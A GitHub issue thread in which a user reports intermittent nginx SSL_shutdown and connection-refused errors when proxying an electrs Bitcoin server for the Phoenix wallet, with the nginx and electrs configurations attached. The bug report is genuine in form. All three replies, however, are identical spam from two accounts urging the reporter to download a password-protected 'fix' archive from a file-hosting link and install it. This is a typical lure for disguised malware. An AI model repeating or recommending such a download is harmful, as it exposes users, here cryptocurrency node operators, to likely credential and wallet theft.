### ISSUE TITLE
Bug: SSL shutdown error with Nginx and cannot connect to electrs with Phoenix wallet

### ISSUE THREAD

**Issue by d4n74** [romanz/electrs#1076]
**Describe the bug**
I use the nginx proxy as via an SSL connection with Electrs.  Sometimes, it works and I can connect but other times, I get these errors in the nginx error.log and cannot connect using my Phoenix Wallet:

[error] 519#519: *67 connect() failed (111: Connection refused) while proxying connection, client: 123.123.123.123, server: 0.0.0.0:50002, upstream: "127.0.0.1:50001", bytes from/to client:0/0, bytes from/to upstream:0/0

[crit] 519#519: *67 SSL_shutdown() failed (SSL: error:1C80006C:Provider routines::invalid aad error:0A0C0103:SSL routines::internal error) while proxying connection, client:  123.123.123.123, server: 0.0.0.0:50002, upstream: "127.0.0.1:50001", bytes from/to client:0/0, bytes from/to upstream:0/0

**Electrs version**
- electrs version 0.10.5 (latest)

**System running electrs**
- certbot lets encrypt SSL certificates
- Debian OS v12.5
- nginx v1.22.1

**To Reproduce**
1. Configure and start electrs
2. Setup nginx proxy
3. Connect with electrum client (Phoenix walet)
4. Wait
5. See nginx error.log

**Expected behavior**
I should be able to connect to electrs using my bitcoin lightning client (Phoenix wallet).  Someday it works but in the past 2 days, I only get these SSL errors and cannot connect. I didn't change anything to the server.

**Configuration**
nginx.conf

user www-data;
worker_processes auto;
pid /run/nginx.pid;
error_log /var/log/nginx/error.log;
include /etc/nginx/modules-enabled/*.conf;

events {
        worker_connections 768;
}

http {

        sendfile on;
        tcp_nopush on;
        types_hash_max_size 2048;

        include /etc/nginx/mime.types;
        default_type application/octet-stream;

        ssl_protocols TLSv1.2 TLSv1.3; # Dropping SSLv3, ref: POODLE
        ssl_prefer_server_ciphers on;

        access_log /var/log/nginx/access.log;

        gzip on;

        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}

stream {
        upstream electrs {
                server 127.0.0.1:50001;
        }

        server {
                listen 50002 ssl;
                proxy_pass electrs;

                ssl_certificate /etc/letsencrypt/live/bitcoinnode.radicalshield.com/fullchain.pem;
                ssl_certificate_key /etc/letsencrypt/live/bitcoinnode.radicalshield.com/privkey.pem;
                ssl_session_cache shared:SSL:1m;
                ssl_session_timeout 4h;
                ssl_protocols TLSv1 TLSv1.1 TLSv1.2 TLSv1.3;
                ssl_prefer_server_ciphers on;
        }
}

**Configuration**
electrs.conf 

network = "bitcoin"
cookie_file = "/data/bitcoin/.cookie"
daemon_dir= "/data/bitcoin"
daemon_rpc_addr = "127.0.0.1:8332"
daemon_p2p_addr = "127.0.0.1:8333"

electrum_rpc_addr = "127.0.0.1:50001"
db_dir = "/data/bitcoin/.electrs/db"

log_filters = "DEBUG"

**Electrum client**
Phoenix wallet 2.3.6

**Additional context**
The problem is intermittent.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
